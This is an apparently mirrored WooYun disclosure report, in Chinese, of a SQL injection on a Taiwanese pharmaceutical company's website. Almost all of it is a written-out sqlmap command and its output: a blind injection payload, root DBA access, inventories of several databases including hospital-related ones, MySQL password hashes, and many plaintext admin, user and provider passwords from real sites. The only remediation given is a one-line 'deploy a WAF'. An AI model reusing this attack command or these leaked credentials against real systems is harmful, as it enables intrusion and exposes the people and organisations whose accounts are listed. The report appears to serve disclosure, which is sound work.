乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经确认,细节仅向厂商公开 2015-12-17: 细节向核心白帽子及相关领域专家公开 2015-12-27: 细节向普通白帽子公开 2016-01-06: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
五洲製藥本諸「良心做事,道德製藥」之理念。先研究不傷身體:藥品的安全性優先;再講究效果:才講求藥品的藥效。
地址:http://**.**.**.**/news_detail.php?id=14
$ python sqlmap.py -u "http://**.**.**.**/news_detail.php?id=14" -p id --technique=B --random-agent --batch --no-cast --current-user --is-dba --users--passwords --count --search -C pass --output-dir=output
current user: 'root@localhost'current user is DBA: Truedatabase management system users [4]:[*] 'dmu'@'localhost'[*] 'fenfan'@'localhost'[*] 'project'@'localhost'[*] 'root'@'localhost'database management system users password hashes:[*] dmu [1]: password hash: *D3C4FBED5A158CF38DFB3C9A2F3BDB6ADE3ECE39[*] fenfan [1]: password hash: *1DD724553F42BA047FD7DAED76E5C702911D9496 clear-text password: fenfan[*] project [1]: password hash: *FD0B2F9649853705D5A8A1D84AEA4B57B9590B23 clear-text password: project[*] root [1]: password hash: *2C6240B651D9BCA24950C80314780A7F340668DF
Database: ntuhrstw_davinciTable: administrator[1 entry]+---------------------------------------------------+| password |+---------------------------------------------------+| *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |+---------------------------------------------------+Database: ntuhrstw_davinci_enTable: administrator[1 entry]+-------------------------------------------+| password |+-------------------------------------------+| *D3B38D0BF9A6462C956D0329383606875826ED01 |+-------------------------------------------+Database: moyage_beaconTable: admin[3 entries]+-------------+| password |+-------------+| admin || afra8158 || curtiskuang |+-------------+Database: moyage_beaconTable: users[50 entries]+------------+| password |+------------+| || || || || || || || || || || || || || || || || || 11 || 2xiiuili || 2xiiuili || afra2012 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || curtis0803 || dernt6889 || test12345 || test12345 || test12345 || tucott98 |+------------+Database: moyage_beaconTable: providers[31 entries]+-----------+| password |+-----------+| 0001 || 0001 || 0001 || 0001 || 0160c99 || 1111 || 1qaz2wsx || 2xiiuili || 4b5aae8 || 62e1a9d || aabbcc || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || e9972a8 || fffff || is888ing || iyaya6 || ladygaga1 || nmhgov || saart || steam888 || test123 || try123 || FFFFF |+-----------+Database: davinciTable: admin[1 entry]+----------+| password |+----------+| davinci |+----------+Database: unisonsr_davinciTable: admin[1 entry]+---------------+| password |+---------------+| dvsrg24471655 |+---------------+Database: tentandesign_flashTable: admin[1 entry]+--------------+| password |+--------------+| tentandesign |+--------------+Database: tentandesign_flashTable: news[8 entries]+----------+| password |+----------+| || || || || || || || |+----------+Database: mysqlTable: user[4 entries]+-----------------------------------------------------+| Password |+-----------------------------------------------------+| *1DD724553F42BA047FD7DAED76E5C702911D9496 (fenfan) || *2C6240B651D9BCA24950C80314780A7F340668DF || *D3C4FBED5A158CF38DFB3C9A2F3BDB6ADE3ECE39 || *FD0B2F9649853705D5A8A1D84AEA4B57B9590B23 (project) |+-----------------------------------------------------+Database: mysqlTable: servers[0 entries]+----------+| Password |+----------++----------+Database: ntuh_davinciTable: administrator[2 entries]+---------------------------------------------------+| password |+---------------------------------------------------+| *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) || *D3B38D0BF9A6462C956D0329383606875826ED01 |+---------------------------------------------------+
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=14 AND 2442=2442---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.31back-end DBMS: MySQL >= 5.0.0current user: 'root@localhost'current user is DBA: Truedatabase management system users [4]:[*] 'dmu'@'localhost'[*] 'fenfan'@'localhost'[*] 'project'@'localhost'[*] 'root'@'localhost'database management system users password hashes:[*] dmu [1]: password hash: *D3C4FBED5A158CF38DFB3C9A2F3BDB6ADE3ECE39[*] fenfan [1]: password hash: *1DD724553F42BA047FD7DAED76E5C702911D9496 clear-text password: fenfan[*] project [1]: password hash: *FD0B2F9649853705D5A8A1D84AEA4B57B9590B23 clear-text password: project[*] root [1]: password hash: *2C6240B651D9BCA24950C80314780A7F340668DFDatabase: ntuhrstw_davinci+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| data_storage | 228 || doctors | 29 || surgery | 28 || news | 15 || qa | 12 || teach_research | 11 || team_categories | 8 || leave_message | 2 || wardmate | 2 || administrator | 1 || nurses | 1 |+---------------------------------------+---------+Database: performance_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| setup_consumers | 8 || performance_timers | 5 || setup_timers | 1 |+---------------------------------------+---------+Database: davinci+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| data_storage | 301 || categories | 169 || admin | 1 |+---------------------------------------+---------+Database: moyage_beacon+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| user_attend_time | 5384 || provider_push_info | 1840 || user_item_halt_time | 1010 || user_device_logs | 120 || data_storage | 104 || provider_push | 87 || confirm_code_logs | 71 || promotion_info | 53 || activity_quiz_result | 52 || users | 50 || customer_survey | 40 || coupon_user | 39 || coupon | 37 || items | 37 || user_share_logs | 37 || activity_quiz | 36 || providers | 31 || activities | 30 || beacon | 26 || provider_beacon | 26 || provider_units | 23 || provider_contract | 21 || promotion_info_user | 14 || brand | 8 || service_categories | 5 || admin | 3 |+---------------------------------------+---------+Database: ntuhrstw_davinci_en+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| data_storage | 229 || doctors | 29 || surgery | 28 || news | 15 || qa | 12 || teach_research | 11 || team_categories | 8 || leave_message | 2 || wardmate | 2 || administrator | 1 || nurses | 1 |+---------------------------------------+---------+Database: unisonsr_davinci+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| data_storage | 330 || categories | 186 || admin | 1 |+---------------------------------------+---------+Database: tentandesign_html+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| project_pic | 744 || project | 97 || news | 5 || member | 4 || a | 3 || admin | 1 |+---------------------------------------+---------+Database: mysql+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| help_relation | 1047 || help_topic | 511 || help_keyword | 467 || help_category | 40 || `user` | 4 || proc | 3 || db | 2 || func | 2 || proxies_priv | 1 |+---------------------------------------+---------+Database: ntuh_davinci+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| data_storage | 155 || surgery | 28 || doctors | 27 || news | 12 || qa | 12 || teach_research | 11 || team_categories | 8 || administrator | 2 || event | 2 || wardmate | 2 || leave_message | 1 || nurses | 1 |+---------------------------------------+---------+Database: ucpharm+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| resume | 3212 || product | 80 || product_categories | 25 || data_storage | 20 || cf | 17 || news | 15 || responsibility_art_promotion | 7 || careers_info | 4 || contact | 2 || administrator | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| INNODB_BUFFER_PAGE | 18752 || COLUMNS | 1924 || INNODB_BUFFER_PAGE_LRU | 1427 || SESSION_VARIABLES | 331 || GLOBAL_VARIABLES | 319 || GLOBAL_STATUS | 312 || SESSION_STATUS | 312 || STATISTICS | 243 || COLLATION_CHARACTER_SET_APPLICABILITY | 197 || COLLATIONS | 197 || PARTITIONS | 171 || TABLES | 171 || KEY_COLUMN_USAGE | 133 || TABLE_CONSTRAINTS | 109 || USER_PRIVILEGES | 58 || CHARACTER_SETS | 39 || PLUGINS | 23 || SCHEMA_PRIVILEGES | 22 || SCHEMATA | 14 || ENGINES | 9 || PARAMETERS | 6 || INNODB_CMP | 5 || INNODB_CMP_RESET | 5 || INNODB_CMPMEM | 5 || INNODB_CMPMEM_RESET | 5 || ROUTINES | 3 || INNODB_BUFFER_POOL_STATS | 1 || PROCESSLIST | 1 |+---------------------------------------+---------+Database: tentandesign_flash+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| project_pic | 503 || project | 70 || news | 8 || member | 4 || admin | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: ntuhrstw_davinciTable: administrator[1 column]+----------+| Column |+----------+| password |+----------+Database: davinciTable: admin[1 column]+----------+| Column |+----------+| password |+----------+Database: ntuh_davinciTable: administrator[1 column]+----------+| Column |+----------+| password |+----------+Database: ntuhrstw_davinci_enTable: administrator[1 column]+----------+| Column |+----------+| password |+----------+Database: unisonsr_davinciTable: admin[1 column]+----------+| Column |+----------+| password |+----------+Database: tentandesign_flashTable: admin[1 column]+----------+| Column |+----------+| password |+----------+Database: tentandesign_flashTable: news[1 column]+----------+| Column |+----------+| password |+----------+Database: mysqlTable: user[1 column]+----------+| Column |+----------+| Password |+----------+Database: mysqlTable: servers[1 column]+----------+| Column |+----------+| Password |+----------+Database: moyage_beaconTable: admin[1 column]+----------+| Column |+----------+| password |+----------+Database: moyage_beaconTable: users[1 column]+----------+| Column |+----------+| password |+----------+Database: moyage_beaconTable: providers[1 column]+----------+| Column |+----------+| password |+----------+Database: tentandesign_htmlTable: admin[1 column]+----------+| Column |+----------+| password |+----------+Database: tentandesign_htmlTable: news[1 column]+----------+| Column |+----------+| password |+----------+Database: ucpharmTable: administrator[1 column]+----------+| Column |+----------+| password |+----------+Database: ntuhrstw_davinciTable: administrator[1 entry]+---------------------------------------------------+| password |+---------------------------------------------------+| *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |+---------------------------------------------------+Database: ntuhrstw_davinci_enTable: administrator[1 entry]+-------------------------------------------+| password |+-------------------------------------------+| *D3B38D0BF9A6462C956D0329383606875826ED01 |+-------------------------------------------+Database: moyage_beaconTable: admin[3 entries]+-------------+| password |+-------------+| admin || afra8158 || curtiskuang |+-------------+Database: moyage_beaconTable: users[50 entries]+------------+| password |+------------+| || || || || || || || || || || || || || || || || || 11 || 2xiiuili || 2xiiuili || afra2012 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || curtis0803 || dernt6889 || test12345 || test12345 || test12345 || tucott98 |+------------+Database: moyage_beaconTable: providers[31 entries]+-----------+| password |+-----------+| 0001 || 0001 || 0001 || 0001 || 0160c99 || 1111 || 1qaz2wsx || 2xiiuili || 4b5aae8 || 62e1a9d || aabbcc || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || afra8158 || e9972a8 || fffff || is888ing || iyaya6 || ladygaga1 || nmhgov || saart || steam888 || test123 || try123 || FFFFF |+-----------+Database: davinciTable: admin[1 entry]+----------+| password |+----------+| davinci |+----------+Database: unisonsr_davinciTable: admin[1 entry]+---------------+| password |+---------------+| dvsrg24471655 |+---------------+Database: tentandesign_flashTable: admin[1 entry]+--------------+| password |+--------------+| tentandesign |+--------------+Database: tentandesign_flashTable: news[8 entries]+----------+| password |+----------+| || || || || || || || |+----------+Database: mysqlTable: user[4 entries]+-----------------------------------------------------+| Password |+-----------------------------------------------------+| *1DD724553F42BA047FD7DAED76E5C702911D9496 (fenfan) || *2C6240B651D9BCA24950C80314780A7F340668DF || *D3C4FBED5A158CF38DFB3C9A2F3BDB6ADE3ECE39 || *FD0B2F9649853705D5A8A1D84AEA4B57B9590B23 (project) |+-----------------------------------------------------+Database: mysqlTable: servers[0 entries]+----------+| Password |+----------++----------+Database: ntuh_davinciTable: administrator[2 entries]+---------------------------------------------------+| password |+---------------------------------------------------+| *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) || *D3B38D0BF9A6462C956D0329383606875826ED01 |+---------------------------------------------------+Database: ucpharmTable: administrator[1 entry]+----------+| password |+----------+| ucpharm |+----------+Database: tentandesign_htmlTable: admin[1 entry]+--------------+| password |+--------------+| tentandesign |+--------------+Database: tentandesign_htmlTable: news[5 entries]+----------+| password |+----------+| || || || 1234 || 12345 |+----------+
上WAF。
危害等级:高
漏洞Rank:18
确认时间:2015-12-07 01:02
感謝通報
2016-02-20:HITCON 於接獲通報後多次 email 該網站所示之服務信箱,至漏洞公開時仍無回應。